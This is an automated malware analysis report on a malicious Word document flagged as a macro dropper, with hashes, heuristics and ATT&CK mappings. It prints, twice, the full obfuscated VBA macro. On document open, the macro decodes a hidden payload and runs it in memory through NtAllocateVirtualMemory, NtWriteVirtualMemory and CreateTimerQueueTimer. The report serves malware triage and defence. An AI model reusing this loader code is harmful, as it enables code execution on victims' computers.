Office (OLE) malware analysis — malicious · ee1dcc6cc7591d71

MALICIOUS

Office (OLE)

208.0 KB Created: 2017-10-05 14:11:00 Authoring application: Microsoft Office Word First seen: 2017-10-10

MD5: 0018ec99389ec2ee76a9e99c92f32ebf SHA-1: 68434ae97133e7d2279d679964f8fb0d91ad74f9 SHA-256: ee1dcc6cc7591d7181492bc97382c6db047402dd53bd4ce015d63fc5d701a750

110 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, including a Document_Open macro, and instructs the user to enable macros, indicating a malicious intent to execute code. ClamAV detected this file as 'Doc.Dropper.Agent-6339813-0', suggesting it functions as a dropper for other malicious payloads. No specific malware family could be confidently identified.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6339813-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6339813-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_Open()
Dim abnegation As Variant
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12283 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12283 bytes
SHA-256: `0ae5a4b154c1a477610aa44cbb1f969064d9ebee579f91e21f03df8bfde60a25`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function crumply(costar) Dim laceration As String Dim zipper As Integer Dim hieratic As Long Dim counterespionage As Integer #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim bayou As String Dim biolets As LongPtr scintillating = 59 - 25 - 26 Dim handicraftsman As LongPtr Dim playtime As Integer Dim probably As Integer Dim mitigate As LongPtr Dim autotypic As Integer #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim biolets As Long scintillating = 47 - 5 - 38 Dim handicraftsman As Long Dim mitigate As Long #End If bergen = VarPtr(biolets) amorously = embowel(bergen, VarPtr(costar) + 8, scintillating) sonorousness = 19 - 34 + 14 handicraftsman = 92 - 2 - 90 anomalops = 52 - 13 - 39 mitigate = 16 - 72 + 10042 aidance = 115 - 85 + 4066 avidity = 99 - 96 + 61 myrrh = cyclopia(ByVal sonorousness, _ handicraftsman, ByVal anomalops, mitigate, ByVal aidance, _ ByVal avidity) abiotrophy = kook * 1 abiotrophy = Fix(469) embowel handicraftsman, biolets, 53 - 55 + 5885 generality = 63 bronchitis = 24869 smolderingly = 178415 Pmt 0, generality, 20274, 59399, 3 crumply = handicraftsman End Function Function cartwheel() Dim chihuahua As String Dim attemper As Integer muse.station.Value = Day(#12/5/2013#) varday = coaster = "lamarckism" coolie = "prince" avariciously = gasherbrum ciel = "cannons" outspoken = "modesty" manageability = substructure artwork = "alcohol" Set iodinating = muse.station.SelectedItem feaze = 46 octameter = 31484 coffer = 138604 Pmt 0, feaze, 36468, 15117, 4 concept = iodinating.Name mantilla = 70 - 33 + 7807 hemorrhage = Right(concept, mantilla) depiction = coodule.necessita(hemorrhage) ledge = 11 induration = 13165 peirce = 117822 Pmt 0, ledge, 28213, 44769, 5 hugueninia = "oilbird" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim iconography As Variant Dim doomed As LongPtr Dim muggee As LongPtr Dim lorcha As Integer Dim niblick As Integer Dim broncho As LongPtr Dim handwheel As LongPtr Dim hiss As LongPtr laocoon = 11 - 58 + 2111 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim sporangium As Integer Dim muggee As Long Dim guttaserena As String Dim doomed As Long Dim broncho As Long dogfish = 23 - 116 + 874 Dim handwheel As Long Dim hiss As Long laocoon = dogfish + 3459 #End If perfusion = 10 - 126 + 116 shipside = "pakistani" woven = "unbought" flipflop = 38 - 10 + 4068 erinaceus = 66 unbound = 8241 arborical = 567881 Pmt 0, erinaceus, 27575, 12079, 5 capability = oneway condensed = "dysmenorrhea" discourage = "prospectively" tall = 116 claustrophobia = 4014 johnsonian = 166406 Pmt 0, tall, 5232, 35807, 3 polysaccharide = depiction remarkably = "guttering" fatally = "crosslinguistic" doomed = crumply(polysaccharide) underthecounter = "nefariously" Dim rebel As Byte Dim shawl As Long broncho = 127 - 52 - 75 muggee = doomed + laocoon handwheel = 48 - 114 + 201593 hiss = 3 - 42 + 3539 demodulation = idotism(handwheel, broncho, muggee, broncho, broncho, broncho, broncho) amice = 26 chambers = 7519 chawbacon = 143884 Pmt 0, amice, 34526, 50244, 6 End Function Private Sub Document_Open() Dim abnegation As Variant Dim prelude As Variant hobbyhorse = "bleeding" dismiss = "irradiation" cartwheel wifely = 10 + 4 mohammedian = 29310 + 3 centerfire = 116460 + 4 Pmt 0, wifely, 39054, 21416, 5 End Sub Attribute VB_Name = "anesthetic" ' I was doing alright ' But just your sight had my heart storming #If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then ' Then you rolled in with your hair in the wind ' Knew it was gonna be a long night Public Declare PtrSafe Function kowtow Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal numerable As Any, aerostatics As Any, arcadic As Any, taoist As Any) As LongPtr ' Then you rolled in with your hair in the wind ' And walked out Public Declare PtrSafe Function offered Lib "ntdll.dll " Alias _ "AcquireSRWLockShared" (agains As Any) As LongPtr ' Then you rolled in with your hair in the wind ' But just your sight had my heart storming Public Declare PtrSafe Function bon Lib "ntdll.dll " Alias _ "NtWriteVirtualMemory" (ByVal charlatanism As Any, ByVal ceremonie As Any, ByVal intracranial As Any, ByVal combinable As Any, ByVal eatage As Any) As LongPtr ' Hit me like a hurricane ' But you rolled in with your hair in the wind Public Declare PtrSafe Function idotism Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (aruspex As Any, ByVal conchfish As Any, ByVal adjuration As Any, ByVal quadrifoliolate As Any, ByVal dilettantism As Any, ByVal acinonyx As Any, ByVal bucktooth As Any) As Long ' From the moment when ' Then you rolled in with your hair in the wind Public Declare PtrSafe Function cyclopia Lib "ntdll.dll " Alias _ "NtAllocateVirtualMemory" (nosegay As LongPtr, cenotaph As LongPtr, ByVal astrodynamics As LongPtr, abdomenByVal As LongPtr, detachment As LongPtr, ByVal bewitchery As LongPtr) As LongPtr ' Rain was driving, thunder, lightning ' From the moment when ' And walked out #End If ' The moon went hiding, stars quit shining ' Driving us to your house #If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then ' Hit me like a hurricane ' Started talking bout us again Public Declare Function idotism Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (conceivable As Any, ByVal azathioprine As Any, ByVal internally As Any, ByVal jube As Any, ByVal aback As Any, ByVal chunnel As Any, ByVal pursuit As Any) As Long ' I was doing alright ' You wrecked my whole world when you came Public Declare Function absolver Lib "Shlwapi.dll " Alias _ "GetOverlappedResult" (ByVal arabia As Any, kalahari As Any, hosanna As Any, fruitarian As Any) As Long ' Knew it was gonna be a long night ' Knew it was gonna be a long night Public Declare Function cyclopia Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (baboon As Long, degrade As Long, ByVal anastatica As Long, intermittenceByVal As Long, smothered As Long, ByVal cebidae As Long) As Long ' The moon went hiding, stars quit shining ' I was doing alright Public Declare Function bon Lib "Ntdll.dll " Alias _ "NtWriteVirtualMemory" (ByVal slippery As Any, ByVal extinguuntur As Any, ByVal momordica As Any, ByVal ticktacktoe As Any, ByVal ingenuousness As Any) As Long ' I was doing alright ' And walked out ' And hit me like a hurricane #End If ' You wrecked my whole world when you came ' Then you rolled in with your hair in the wind Attribute VB_Name = "muse" Attribute VB_Base = "0{0DDCC70F-9313-4CB2-9902-4930CEABED4F}{565D2A9F-95E7-4FB3-A81E-7D188D04AC7F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "coodule" Function necessita(filibusterism) As String Dim amhara As Long Dim despotic As Long Dim chylific(63) As Long chihuahua = Rnd(236) Dim kanzu As String Dim rumbling() As Byte chaplaincy = "cotenancy" Dim nectarine(63) As Long Dim halide As Integer Dim fraudulent As Long chaplaincy = balaeniceps Dim collector As Byte Dim attributed As Integer Dim acting As Long Dim doubledistilled As Long Dim teneatis As Long Dim laminaria(6962) As Byte Dim crinkly(63) As Long champain = 74 - 63 + 262133 lofoten = 14 - 91 + 141 arilus = 100 - 118 + 274 pennatula = 111 - 21 + 16514982 unction = 26 - 6 + 16711660 harmonically = 2 - 123 + 65401 indeterminate = 7 - 127 + 4216 Dim visage As Variant solace = 32 - 107 + 4107 per = 66 - 53 + 258035 Dim gaiete As Byte Dim blotches As String detracting = 94 - 57 + 218 ruritanian = 93 - 114 + 84 bawdyhouse = 113 - 42 + 65465 Dim highhandedly As Integer trapdoor = 109 - 27 - 82 bendable = 10 - 119 + 7952 Dim dues() As Byte Dim coexist As String Dim irascible As Long dues = VBA.StrConv(filibusterism, 128) Dim bowman As Long dol = 55 balaenidae = 39679 harpooner = 478586 Pmt 0, dol, 39423, 21006, 7 canteen = 7843 poorwill = vbKeyShift - 12 For launderette = 0 To canteen If launderette Mod 2 = 0 Then dues(launderette) = dues(launderette) - poorwill Else dues(launderette) = dues(launderette) - (poorwill - 1) End If Next launderette ostrogoth = 120 prejudice = 38736 everlastingness = 147988 Pmt 0, ostrogoth, 21597, 33218, 6 halide = 0 bunkum = 20 - 92 + 72 maliciously = 100 - 5 - 52 buttress = benzodiazepine For acting = (7 - 7) * 1 To (50 + 13) * (5 - 4) nectarine(acting) = geococcyx(acting, lofoten, 59) crinkly(acting) = geococcyx(acting, indeterminate, 59) chylific(acting) = geococcyx(acting, champain, 59) Next acting kohl = 10 preparatory = 38832 bloodsport = 594843 Pmt 0, kohl, 7611, 38980, 4 rumbling = dues fond = 9 - 103 + 98 bongo = 17 dray = 7386 packaged = 354105 Pmt 0, bongo, 8700, 43194, 7 vicuna = 12 - 107 + 98 balaeniceps = "steroid" balaeniceps = "scud" oldfashioned = vicuna + 1 bath = 73 - 2 - 69 For amhara = 0 To canteen catmint = rumbling(amhara) bubulcus = rumbling(amhara + 2) prophylaxis = crinkly(buttress(rumbling(amhara + 1))) hierarch = nectarine(buttress(bubulcus)) + buttress(rumbling(amhara + vicuna)) teneatis = chylific(buttress(catmint)) + prophylaxis + hierarch acting = geococcyx(teneatis, unction, 51) laminaria(fraudulent) = geococcyx(acting, bawdyhouse, 41) acting = geococcyx(teneatis, harmonically, 51) laminaria(fraudulent + 1) = geococcyx(acting, arilus, 41) laminaria(fraudulent + bath) = geococcyx(teneatis, detracting, 51) fraudulent = fraudulent + bath + 1 amhara = amhara + 3 Next necessita = laminaria End Function Function benzodiazepine() Dim fleissig(255) As Byte depicting = 28 - 49 + 86 Do While depicting <= 90 + 1 fleissig(depicting) = depicting - 65 depicting = depicting + 1 Loop depicting = 48 Do While depicting <= 50 + 8 fleissig(depicting) = depicting + 4 depicting = depicting + 1 Loop depicting = 97 Do While depicting <= 120 + 3 fleissig(depicting) = depicting - 71 depicting = depicting + 1 Loop fleissig(47) = 63 depicting = 43 fleissig(depicting) = 60 + 2 benzodiazepine = fleissig End Function Function disposition(icefloe) disposition = AscW(icefloe) End Function Function geococcyx(cyclopean, apteral, moonglade) If moonglade = (41 + (10 / 2 - 5)) Then geococcyx = cyclopean \ apteral ElseIf moonglade = (51 + (5 - 3) / 2 - 1) Then geococcyx = cyclopean And apteral ElseIf moonglade = (59 + (56 / 7 - 4 * 2)) Then geococcyx = cyclopean * apteral End If End Function Attribute VB_Name = "Module1" Function embowel(hookah, fairymythology, synercus) #If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then Dim ardor As Integer Dim anserine As Byte Dim aguets As LongPtr Dim annexe As LongPtr Dim ages As LongPtr Dim mint As Variant Dim arius As LongPtr Dim heterometabolous As LongPtr #End If #If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then Dim annexe As Long Dim baptismal As Variant Dim aguets As Long Dim stumblingstone As Variant Dim arius As Long Dim pyrotechnics As Long Dim ages As Long Dim snappish As String Dim heterometabolous As Long Dim highpitched As Variant Dim defamation As String #End If millivoltmeter = chaplaincy chihuahua = Rnd(461) annexe = hookah heterometabolous = synercus chaplaincy = balaeniceps arius = fairymythology guenon = 20 + 3 hardbake = 29280 + 0 microsecond = 297550 + 5 Pmt 0, guenon, 13596, 10065, 4 chihuahua = chihuahua Or 245 aguets = 81 - 1 - 81 bon ByVal aguets, annexe, arius, heterometabolous, ages chihuahua = chihuahua - 158 End Function Attribute VB_Name = "Module2"

SHA-256: 0ae5a4b154c1a477610aa44cbb1f969064d9ebee579f91e21f03df8bfde60a25

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function crumply(costar)
Dim laceration As String
Dim zipper As Integer
Dim hieratic As Long
Dim counterespionage As Integer
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim bayou As String
Dim biolets As LongPtr
scintillating = 59 - 25 - 26
Dim handicraftsman As LongPtr
Dim playtime As Integer
Dim probably As Integer
Dim mitigate As LongPtr
Dim autotypic As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim biolets As Long
scintillating = 47 - 5 - 38
Dim handicraftsman As Long
Dim mitigate As Long
#End If
bergen = VarPtr(biolets)
amorously = embowel(bergen, VarPtr(costar) + 8, scintillating)
sonorousness = 19 - 34 + 14
handicraftsman = 92 - 2 - 90
anomalops = 52 - 13 - 39
mitigate = 16 - 72 + 10042
aidance = 115 - 85 + 4066
avidity = 99 - 96 + 61
myrrh = cyclopia(ByVal sonorousness, _
handicraftsman, ByVal anomalops, mitigate, ByVal aidance, _
ByVal avidity)
abiotrophy = kook * 1

abiotrophy = Fix(469)

embowel handicraftsman, biolets, 53 - 55 + 5885
generality = 63
bronchitis = 24869
smolderingly = 178415
 Pmt 0, generality, 20274, 59399, 3

crumply = handicraftsman
End Function
Function cartwheel()
Dim chihuahua As String
Dim attemper As Integer
muse.station.Value = Day(#12/5/2013#)
varday = coaster = "lamarckism"
coolie = "prince"
avariciously = gasherbrum
ciel = "cannons"
outspoken = "modesty"

manageability = substructure
artwork = "alcohol"
Set iodinating = muse.station.SelectedItem
feaze = 46
octameter = 31484
coffer = 138604
 Pmt 0, feaze, 36468, 15117, 4

concept = iodinating.Name
mantilla = 70 - 33 + 7807
hemorrhage = Right(concept, mantilla)
depiction = coodule.necessita(hemorrhage)
ledge = 11
induration = 13165
peirce = 117822
 Pmt 0, ledge, 28213, 44769, 5

hugueninia = "oilbird"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim iconography As Variant
Dim doomed As LongPtr
Dim muggee As LongPtr
Dim lorcha As Integer

Dim niblick As Integer
Dim broncho As LongPtr
Dim handwheel As LongPtr
Dim hiss As LongPtr
laocoon = 11 - 58 + 2111
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sporangium As Integer
Dim muggee As Long
Dim guttaserena As String
Dim doomed As Long

Dim broncho As Long
dogfish = 23 - 116 + 874
Dim handwheel As Long
Dim hiss As Long
laocoon = dogfish + 3459
#End If
perfusion = 10 - 126 + 116
shipside = "pakistani"
woven = "unbought"
flipflop = 38 - 10 + 4068
erinaceus = 66
unbound = 8241
arborical = 567881
 Pmt 0, erinaceus, 27575, 12079, 5

capability = oneway
condensed = "dysmenorrhea"
discourage = "prospectively"
tall = 116
claustrophobia = 4014
johnsonian = 166406
 Pmt 0, tall, 5232, 35807, 3

polysaccharide = depiction
remarkably = "guttering"
fatally = "crosslinguistic"
doomed = crumply(polysaccharide)
underthecounter = "nefariously"
Dim rebel As Byte
Dim shawl As Long
broncho = 127 - 52 - 75
muggee = doomed + laocoon
handwheel = 48 - 114 + 201593
hiss = 3 - 42 + 3539
demodulation = idotism(handwheel, broncho, muggee, broncho, broncho, broncho, broncho)
amice = 26
chambers = 7519
chawbacon = 143884
 Pmt 0, amice, 34526, 50244, 6

End Function
Private Sub Document_Open()
Dim abnegation As Variant
Dim prelude As Variant
hobbyhorse = "bleeding"
dismiss = "irradiation"
cartwheel
wifely = 10 + 4
mohammedian = 29310 + 3
centerfire = 116460 + 4
 Pmt 0, wifely, 39054, 21416, 5
End Sub

Attribute VB_Name = "anesthetic"
'  I was doing alright
'  But just your sight had my heart storming
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
'  Then you rolled in with your hair in the wind
'  Knew it was gonna be a long night
Public Declare PtrSafe Function kowtow Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal numerable As Any, aerostatics As Any, arcadic As Any, taoist As Any) As LongPtr
'  Then you rolled in with your hair in the wind
'  And walked out
Public Declare PtrSafe Function offered Lib "ntdll.dll  " Alias _
  "AcquireSRWLockShared" (agains As Any) As LongPtr
'  Then you rolled in with your hair in the wind
'  But just your sight had my heart storming
Public Declare PtrSafe Function bon Lib "ntdll.dll  " Alias _
  "NtWriteVirtualMemory" (ByVal charlatanism As Any, ByVal ceremonie As Any, ByVal intracranial As Any, ByVal combinable As Any, ByVal eatage As Any) As LongPtr
'  Hit me like a hurricane
'  But you rolled in with your hair in the wind
Public Declare PtrSafe Function idotism Lib "Kernel32" Alias _
  "CreateTimerQueueTimer" (aruspex As Any, ByVal conchfish As Any, ByVal adjuration As Any, ByVal quadrifoliolate As Any, ByVal dilettantism As Any, ByVal acinonyx As Any, ByVal bucktooth As Any) As Long
'  From the moment when
'  Then you rolled in with your hair in the wind
Public Declare PtrSafe Function cyclopia Lib "ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (nosegay As LongPtr, cenotaph As LongPtr, ByVal astrodynamics As LongPtr, abdomenByVal As LongPtr, detachment As LongPtr, ByVal bewitchery As LongPtr) As LongPtr
'  Rain was driving, thunder, lightning
'  From the moment when
'  And walked out
#End If
'  The moon went hiding, stars quit shining
'  Driving us to your house
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
'  Hit me like a hurricane
'  Started talking bout us again
Public Declare Function idotism Lib "Kernel32" Alias _
   "CreateTimerQueueTimer" (conceivable As Any, ByVal azathioprine As Any, ByVal internally As Any, ByVal jube As Any, ByVal aback As Any, ByVal chunnel As Any, ByVal pursuit As Any) As Long
'  I was doing alright
'  You wrecked my whole world when you came
Public Declare Function absolver Lib "Shlwapi.dll  " Alias _
  "GetOverlappedResult" (ByVal arabia As Any, kalahari As Any, hosanna As Any, fruitarian As Any) As Long
'  Knew it was gonna be a long night
'  Knew it was gonna be a long night
Public Declare Function cyclopia Lib "Ntdll.dll " Alias _
  "NtAllocateVirtualMemory" (baboon As Long, degrade As Long, ByVal anastatica As Long, intermittenceByVal As Long, smothered As Long, ByVal cebidae As Long) As Long
'  The moon went hiding, stars quit shining
'  I was doing alright
Public Declare Function bon Lib "Ntdll.dll   " Alias _
"NtWriteVirtualMemory" (ByVal slippery As Any, ByVal extinguuntur As Any, ByVal momordica As Any, ByVal ticktacktoe As Any, ByVal ingenuousness As Any) As Long
'  I was doing alright
'  And walked out
'  And hit me like a hurricane
#End If
'  You wrecked my whole world when you came
'  Then you rolled in with your hair in the wind


Attribute VB_Name = "muse"
Attribute VB_Base = "0{0DDCC70F-9313-4CB2-9902-4930CEABED4F}{565D2A9F-95E7-4FB3-A81E-7D188D04AC7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "coodule"
Function necessita(filibusterism) As String
Dim amhara As Long
Dim despotic As Long

Dim chylific(63) As Long
chihuahua = Rnd(236)

Dim kanzu As String
Dim rumbling() As Byte
chaplaincy = "cotenancy"

Dim nectarine(63) As Long
Dim halide As Integer
Dim fraudulent As Long
chaplaincy = balaeniceps

Dim collector As Byte

Dim attributed As Integer

Dim acting As Long
Dim doubledistilled As Long

Dim teneatis As Long
Dim laminaria(6962) As Byte
Dim crinkly(63) As Long
champain = 74 - 63 + 262133
lofoten = 14 - 91 + 141
arilus = 100 - 118 + 274
pennatula = 111 - 21 + 16514982
unction = 26 - 6 + 16711660
harmonically = 2 - 123 + 65401
indeterminate = 7 - 127 + 4216
Dim visage As Variant

solace = 32 - 107 + 4107
per = 66 - 53 + 258035
Dim gaiete As Byte

Dim blotches As String

detracting = 94 - 57 + 218
ruritanian = 93 - 114 + 84
bawdyhouse = 113 - 42 + 65465
Dim highhandedly As Integer
trapdoor = 109 - 27 - 82
bendable = 10 - 119 + 7952
Dim dues() As Byte
Dim coexist As String
Dim irascible As Long
dues = VBA.StrConv(filibusterism, 128)
Dim bowman As Long
dol = 55
balaenidae = 39679
harpooner = 478586
 Pmt 0, dol, 39423, 21006, 7

canteen = 7843
poorwill = vbKeyShift - 12
For launderette = 0 To canteen
If launderette Mod 2 = 0 Then
dues(launderette) = dues(launderette) - poorwill
Else
dues(launderette) = dues(launderette) - (poorwill - 1)
End If
Next launderette
ostrogoth = 120
prejudice = 38736
everlastingness = 147988
 Pmt 0, ostrogoth, 21597, 33218, 6

halide = 0
bunkum = 20 - 92 + 72
maliciously = 100 - 5 - 52
buttress = benzodiazepine
For acting = (7 - 7) * 1 To (50 + 13) * (5 - 4)
nectarine(acting) = geococcyx(acting, lofoten, 59)
crinkly(acting) = geococcyx(acting, indeterminate, 59)
chylific(acting) = geococcyx(acting, champain, 59)
Next acting
kohl = 10
preparatory = 38832
bloodsport = 594843
 Pmt 0, kohl, 7611, 38980, 4

rumbling = dues
fond = 9 - 103 + 98
bongo = 17
dray = 7386
packaged = 354105
 Pmt 0, bongo, 8700, 43194, 7

vicuna = 12 - 107 + 98
balaeniceps = "steroid"

balaeniceps = "scud"

oldfashioned = vicuna + 1
bath = 73 - 2 - 69
For amhara = 0 To canteen
catmint = rumbling(amhara)
bubulcus = rumbling(amhara + 2)
prophylaxis = crinkly(buttress(rumbling(amhara + 1)))
hierarch = nectarine(buttress(bubulcus)) + buttress(rumbling(amhara + vicuna))
teneatis = chylific(buttress(catmint)) + prophylaxis + hierarch
acting = geococcyx(teneatis, unction, 51)
laminaria(fraudulent) = geococcyx(acting, bawdyhouse, 41)
acting = geococcyx(teneatis, harmonically, 51)
laminaria(fraudulent + 1) = geococcyx(acting, arilus, 41)
laminaria(fraudulent + bath) = geococcyx(teneatis, detracting, 51)
fraudulent = fraudulent + bath + 1
amhara = amhara + 3
Next
necessita = laminaria
End Function

Function benzodiazepine()
Dim fleissig(255) As Byte
depicting = 28 - 49 + 86
Do While depicting <= 90 + 1
fleissig(depicting) = depicting - 65
depicting = depicting + 1
Loop
depicting = 48
Do While depicting <= 50 + 8
fleissig(depicting) = depicting + 4
depicting = depicting + 1
Loop
depicting = 97
Do While depicting <= 120 + 3
fleissig(depicting) = depicting - 71
depicting = depicting + 1
Loop
fleissig(47) = 63
depicting = 43
fleissig(depicting) = 60 + 2
benzodiazepine = fleissig
End Function
Function disposition(icefloe)
disposition = AscW(icefloe)
End Function
Function geococcyx(cyclopean, apteral, moonglade)
If moonglade = (41 + (10 / 2 - 5)) Then
geococcyx = cyclopean \ apteral
ElseIf moonglade = (51 + (5 - 3) / 2 - 1) Then
geococcyx = cyclopean And apteral
ElseIf moonglade = (59 + (56 / 7 - 4 * 2)) Then
geococcyx = cyclopean * apteral
End If
End Function

Attribute VB_Name = "Module1"

Function embowel(hookah, fairymythology, synercus)
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim ardor As Integer
Dim anserine As Byte
Dim aguets As LongPtr
Dim annexe As LongPtr
Dim ages As LongPtr
Dim mint As Variant
Dim arius As LongPtr
Dim heterometabolous As LongPtr
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim annexe As Long
Dim baptismal As Variant
Dim aguets As Long
Dim stumblingstone As Variant
Dim arius As Long
Dim pyrotechnics As Long
Dim ages As Long
Dim snappish As String
Dim heterometabolous As Long
Dim highpitched As Variant
Dim defamation As String
#End If
millivoltmeter = chaplaincy
chihuahua = Rnd(461)
annexe = hookah
heterometabolous = synercus
chaplaincy = balaeniceps
arius = fairymythology
guenon = 20 + 3
hardbake = 29280 + 0
microsecond = 297550 + 5
 Pmt 0, guenon, 13596, 10065, 4

chihuahua = chihuahua Or 245
aguets = 81 - 1 - 81
bon ByVal aguets, annexe, arius, heterometabolous, ages
chihuahua = chihuahua - 158
End Function

Attribute VB_Name = "Module2"

Open this report in the interactive analyzer, or submit your own file for analysis.